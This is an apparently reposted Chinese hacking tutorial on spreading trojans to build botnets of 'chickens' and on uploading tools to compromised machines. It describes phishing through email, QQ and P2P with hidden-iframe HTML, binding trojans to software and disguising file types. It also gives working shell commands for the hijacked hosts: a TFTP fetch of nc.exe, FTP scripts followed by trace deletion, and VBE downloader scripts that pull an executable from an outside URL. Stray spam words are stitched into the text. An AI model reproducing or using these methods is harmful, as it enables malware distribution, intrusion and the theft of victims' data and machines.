***抓鸡和上传方法

2024-04-25 20:21:15

一.目前流行***传播技术.

1.用BT制作***种子

利用BT制作***种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的***,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了***的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的***,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页***.可以参看RealOnePla

ye***制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播***.

这里主要点HTML格式在里面写上以下这段代码:

<body ></body>

当人家一打开你发过去的邮件时,就会中我们的***.

4.QQ群发网页***。

首先,你要申请多个QQ号,然后找款QQ消息************(黑鹰网站可以找到大量相关QQ群

发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的多与少与这个直接相关

赤壁钓鱼大赛,),骗取人家点你的网址。最后,在晚上时可以挂在电脑上群发带有网页***的信

息。相信只要你的信息够诱惑,肉鸡也是成群的。

5.利用163邮箱传播网页***。

同样,这里用HTML格式,然后填上以下代码:

</html><iframe src="你的网页***地址" name="zhu" height="0"

frameborder="0">

对方只要一打开,就会中我们的网页***。

这里发送邮件时注意一些技巧,我们要加入一些社会工程会。比如对方是爱好车的,

你就在邮件标题上写上关于车的诱惑性标题。目的只有一个,让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页***。

这里要用到论坛邮箱提取器,这类工具黑鹰也有下载,大家可以找一下。提取大量

邮箱后,配合FOXMAIL这款软件进行群发传播带有网页***的邮件。这里也要注意技

巧,比如在一个游戏论坛提取的邮箱,你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页***.大部分都认为信息的真实性而点击.从

而中我们的***. 这里还可以配合利用HTML格式群发我们的网页***效果可更佳!

7.捆绑欺骗

这也是比较常用的传播***技术.把***捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了***的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上***放入下载点.

当我们***到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若***到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的***然后放入下载点

等待人家上钩吧!该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页***地址或***.

钓鱼式欺骗***,也是国内最新发现的一种***手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的***.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页***地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而

知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马

这个应该不用具体介绍吧,教程有N多.***到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马

这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装

这里主要把一些***服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的***.真是神不知鬼不觉!本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把***制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:比如制作图片***,也有专门的图片***制作工具,RM***制作

黑鹰也有相关教程,RealOnePlayer***制作,FLASH***制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

二.新型高级***传播技术

下面介绍几种比较高级的***传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在word文档中加入***文件

这种方法非常隐蔽,在WORD文档尾加入***文件,只要别人点击这个所谓的WORD文件就

会中***,这种方法主要是通过把一个EXE格式的***文件接在一个DOC文件的末尾,使

别人察觉不到***的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.***工具绑***

其实这本来算不上高级的方法,但最近发现很多***软件发布站,捆了***的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.***

工具本来被杀毒软件查杀,捆了***的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把***中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密***程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.***会将***程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏***.

4.伪装成应用程序扩展组件

此类属于最难识别的特洛伊***,也是骗术最高的***,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现***程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播***的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页***地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播***.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页***的蠕虫了.最近的唐山***就是利用

QQ尾巴传播自己的***,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS***.利用该技术是相当高级的,速度也是最快的.

上传***的8种方法!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

TFTP法传输

我们最喜欢也是最方便的方式是用TFTP!这里要配合TFTP32这个小型的文件传输服务器钓鱼视频,TFTP协议使用的是UDP69端口,在我们得到肉机的SHELL后可以很方便的传输文件到肉机上的!下面看我详细的讲解和操作,在我们得到的SHELL里输入tftp –I IP get/put xx.exe就OK了,注意这里一定要记得带上参数-I,不然是不会成功的,还有要注意的是PUT是把肉鸡上的文件传到我们自己的机子上,一般常用来偷秘密文件(怎么像做贼似的);GET是从我们的机子上取文件到肉鸡上,也就是上传文件到肉鸡上,我们这里要用的是GET这个动作,因为我的IP是222.XXX.XXX.2,所以我就在得到的SHELL里输入tftp –I 222.XXX.XXX.2 get nc.exe就是到我们的机子上取NC这个我们要上传的文件,可以是任何你想传的东西,但是最好传的文件比较小,否则容易失败.

别急着敲回车,我们还要在我们自己的机子上架好TFTP32这个软件才行,这里有个技巧,我们可以把TFTP32这个软件和我们的NC放在一个目录下,这样在取文件时就不用另外写路径了,很是方便,我们把TFTP32放在NC一个目录里打开后它就在69端口监听看有没有需要传送文件的请求,这时我们就在得到的SHELL里写好的那句话后敲回车就就等待上传成功吧~~~~~~

★二★、 Recton程序种植者直接种植

Recton程序种植者又种方法可以用,一个是依赖IPC的,一个则是通过写VBE来用http法下载的,分别叙述如下:

1、IPC上传

IPC上传方式只依赖远程主机开放IPC$和目录共享,不依赖 Task Scheduler服务。具体情况参考下图,远程主机写上对方的IP地址;用户名就是你具备管理员权限的帐号;密码就是你那个帐号的密码;选则IPC上传,在本地选好要上传的文件,最后写上启动参数就OK了!

2、Http法上传

Http下载不需要远程主机开任何共享,也不依赖Task Scheduler服务。其原理是在远程主机上写入、执行一个能从 web上下载文件的VBS脚本。需要注意的是文件地址和启动参数一定要写正确,否则无法执行!文件地址一定要包含http://,如下偶写好的一个例子,运行后就会下载http:/muma.exe并且运行。

★三★、EXE2BAT的超级应用

本例是使用一个名为exe2bat的小工具,在本地打开一个CMD,切换到exe2bat所在目录,输入:exe2bat.exe后回车,exe2bat可以将一个应用程序(.exe)转换为一个批处理文件(.bat),而批处理文件我们是可以编辑的,下面我们就将一个开3389的小工具3389.exe转换为批处理文件。输入:exe2bat.exe 3389.exe 3389.bat,回车后就可以得到一个名为3389.bat批处理文件。

好了,我们用记事本打开生成的批处理文件北京钓鱼,然后点击“编辑”菜单中的“全选”和“复制”命令,将文件中的源代码除了最后2行外全部复制到剪贴板中。

再切换到我们得到的SHELL窗口里,点击右键选择“粘贴”命令把我们刚才复制的字符都粘贴进去,你会看到代码飞速变换,像***帝国里的镜头,很过瘾!

代码复制完成后,输入:ren tvisGRAY 3389.exe命令就可以把3389.exe还原,现在你的这个文件就传上去了。这种方法的优点是不言而喻,因为它可以直接利用已经得到的shell将文件以“代码”的形式输入到对方电脑,不需要任何网络工具的支持,同样也不必打开任何的端口,也没有任何进程,能穿越任何防火墙。不过这种方法也有一个明显的缺点,就是上传的程序体积不能太大,不然代码的上传时间太久不说,再还原成源程序的时候也可能出现问题。

★四★、FTP法传输

有的时候我们自己的计算机没有公网IP地址,这个时候想用TFTO就比较麻烦了,如果你嫌上面的办法比较麻烦的话,那你还可以用这个比较简单的办法就是用FTP,但是我们在得到的SHELL里不能直接登陆我们的FTP服务器去下载东西,这涉及到一些FTP协议的问题,在这里就不详述了,我们只是讨论怎么传文件嘛!当我们不能直接传的时候我们可以换个办法来实现,这个办法就是写个ftp.txt的文件来向FTP服务器提交就可以了。在我们得到的肉鸡的SHELL里写入以下代码:

echo ftp >ftp.txt

echo open服务器ip [端口]>>ftp.txt

echo username>>ftp.txt

echo password>>ftp.txt

echo get sample.exe>>ftp.txt

echo bye>>ftp.txt

其中服务器ip就是你放你想传的文件的FTP的服务器 IP地址;username就是你登陆你的FTP的帐号;password就是你的密码;sample.exe就是你想下载的程序名字。最后一个bye是退出FTP服务器。

其中218.XXX.XX.163 就是我的FTP服务器的IP地址,iceskysl就是我的用户名,653917就是我的密码;mt.exe就是我想下载的文件。我们DIR下看看写成功这个ftp.txt么?

为了确保我们没有写错,最好还是用TYPE命令来看看这个 FTP.TXT文件的内容是不是我们想写进去的,一般来说是不会错的!接着执行ftp -s:ftp.txt 就可以下载到们的那个文件了,我这里下载的就是MT.exe这个文件,显示的就是我成功下载的提示了。

记得最后要用del ftp.txt来删掉我们写的这个TXT文件,要不被发现了我们就亏大了!现在这个文件就传上去了老鬼钓鱼,接着怎么做就不要我教你了吧!

★五★、利用xiazai.vbe法

这个方法也是很简单有效的,我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件,代码如下:

echo with w:if .arguments.count^<2 then .quit:end if >xiazai.vbe

echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe

echo web.open "get",.arguments,0:web.send:if web.status^>200 then quit >>xiazai.vbe

echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe

这样就会在肉鸡中生成一个xiazai.vbe的文件,如下图是我演示的一个结果显示,我们通过DIR可以看到这个xiazai.vbe文件已经成功创建了。

现在我们只要输入c xianzai.vbe http://iceskysl.e2u.cc/server.exe mtt.exe就可以把http://iceskysl.e2u.cc/server.exe这个地址下的这个server.exe下载到肉鸡中并且改名字为mtt.exe,目的达到,接着怎么做,我就不多说了!

★六★、利用iget.vbe法

这个方法同上面的那个差不多,只是写法不一样,具体的还是在肉鸡SHELL中写入下面的代码:

echo iLocal = LCase(W.Arguments(1)) >iget.vbe

echo iRemote = LCase(W.Arguments) >>iget.vbe

echo Set xPost = CreateObject("Microsoft.XMLhttp") >>iget.vbe

echo xPost.Open "GET",iRemote,0 >>iget.vbe

echo xPost.Send() >>iget.vbe

echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe

echo sGet.Mode = 3 >>iget.vbe

echo sGet.Type = 1 >>iget.vbe

echo sGet.Open() >>iget.vbe

echo sGet.Write(xPost.responseBody) >>iget.vbe

echo sGet.SaveToFile iLocal,2 >>iget.vbe

转载于:https://blog.51cto.com/dnsdhcp/592672

***抓鸡和上传方法相关推荐

  1. wincurl:一款基于HTTP协议的轻量级web资源抓取和上传工具

    编写web程序经常要进行接口调测,通常我们会使用curl或者postman等工具,通过这些工具可以方便的发送GET或POST请求来验证接口的正确与否. 对于复杂的接口业务,我们可以通过这些工具构造po ...

  2. 关于FTP上传方法 (by Liang)

    什么是FTP呢?FTP 是 TCP/IP 协议组中的协议之一,是英文File Transfer Protocol的缩写.该协议是Internet文件传送的基础,它由一系列规格说明文档组成,目标是提高文 ...

  3. elment上传pdf文件至服务器,基于element-ui组件手动实现单选和上传功能.pdf

    基基于于element-ui组组件件手手动动实实现现单单选选和和上上传传功功能能 在用户使用过程中提出一键导入的功能,需求如下:点击导入按钮显示提示框,然后是单选框以及上传按钮.这篇 文章 要介绍了基 ...

  4. 微信jssdk图片上传给服务器,使用微信JSSDK进行图片选择和上传

    2015-04-28 2018-08-21 06:20:42 最近我在用 PHP 做某微信公众号的开发,其中用到了微信jssdk进行图片的选择和上传.在参考了微信官方提供的jssdk文档之后,大致有了 ...

  5. vue 移动端头像裁剪_vue头像上传裁剪组件_一个漂亮的Vue组件,用于图像裁剪和上传...

    vue头像上传裁剪组件 vue-image-crop-upload (vue-image-crop-upload) A beautiful vue component for image crop a ...

  6. 一个APP开发者的愤慨:为啥会有打包党和上传手机号

    一个APP开发者的愤慨:为啥会有打包党和上传手机号 2012-10-09 15:10 来源:百度贴吧 编辑:Loading[纠错]2人评论 A-A+ 怎么开淘宝店 网站优化方法 创业如何获得投资 怎么 ...

  7. el-upload使用自定义上传,获取上传进度和上传成功回调

    项目场景: 在后台管理系统上传图片时,使用自定义的上传方法 问题描述 用element-ui + vue2.0上传多张图片,并使用自定义方法时,无法获取上传进度和上传完成后的图片列表,想要获取上传完成 ...

  8. 无线水标数值如何上传服务器,一种精准上传数据的智能水表及用水量记录上传方法...

    1.一种精准上传数据的智能水表,包括计数上传模组电路板(1).齿轮组件(2).计数组件(3).叶轮组件(4):所述叶轮组件(4)位于水表内部的流道内,叶轮组件(4)向上连接驱动齿轮系组件(2),齿轮系 ...

  9. 163邮箱java通用下载_java_java实现163邮箱发送邮件到qq邮箱成功案例,下载和上传附件、发送短信和 - phpStudy...

    java实现163邮箱发送邮件到qq邮箱成功案例 下载和上传附件.发送短信和发送邮件,都算是程序中很常用的功能,之前记录了文件的上传和下载还有发送短信,由于最近比较忙,邮件发送的功能就没有时间去弄,现 ...

  10. Android网络功能开发(4)——文件下载和上传

    本篇介绍使用HTTP协议实现文件下载和上传.在客户端和服务器的通信过程中,可能有些多媒体或数据文件需要下载或上传,可以通过HTTP协议实现. 首先看使用HTTP协议下载文件的原理:客户端发送一个HTT ...

最新文章

  1. 计算机不等长编码有哪些,第9讲最佳不等长编码_W
  2. 与Google用户帐户集成
  3. 为wp博客添加html网页,WP——在博客(wordpress)中嵌入jupyter notebook
  4. 利用Jenkins实现JavaWeb项目的自动化部署
  5. 关于编程学习的一些思考
  6. 搜索 —— 启发式搜索 —— 模拟退火
  7. tablesample oracle,Hive DDL 内部表外部表 分区 分桶 行格式 存储文件格式 概述
  8. Linux 给我的七个宝贵教训
  9. 用java有理数类包含加减乘除_用java具体代码实现分数(即有理数)四则运算
  10. lhdc协议是什么_无线耳机标注的编码是什么意思?看懂了会少很多坑
  11. 内存交换空间(swap)
  12. 简单理解LSTM神经网络
  13. 2016年408考研算法题
  14. 人脸识别翼闸使用规范_介绍市场上最常用的通道翼门和人脸识别的使用
  15. 粗糙集理论(Rough Set Theory)
  16. VSCode常用插件-快捷键
  17. Centos 7 安装 jq json 插件以及使用方法
  18. GEE(Python)逐像元线性拟合
  19. cocos creator2.2.2休闲游戏(单机捕鱼)源码H5+安卓+IOS三端源码
  20. 【VSPD虚拟串口】【Modbus Poll】【Modbus Slave】仿真工具的学习过程

热门文章

  1. HI3518E 中Sample Venc分析
  2. Win7精简成功后的总结
  3. linux fastboot工具,Linux下使用Fastboot给手机刷机
  4. J2EE实战开发Android项目视频教程
  5. 【计算机毕业设计】基于SpringBoot的物流管理系统
  6. C语言十六进制大小端转换,大小端转换(一篇文章了解所有情况下的大小端转换方法)...
  7. 使用python读取excel文件数据,修改dbf文件
  8. ubuntu cmakelists 配置海康 SDK
  9. web应用渗透测试流程
  10. JavaWeb图书管理系统.rar(毕业设计(论文)+毕业设计指导书+大学毕业设计任务书+图书管理系统+毕业论文答辩)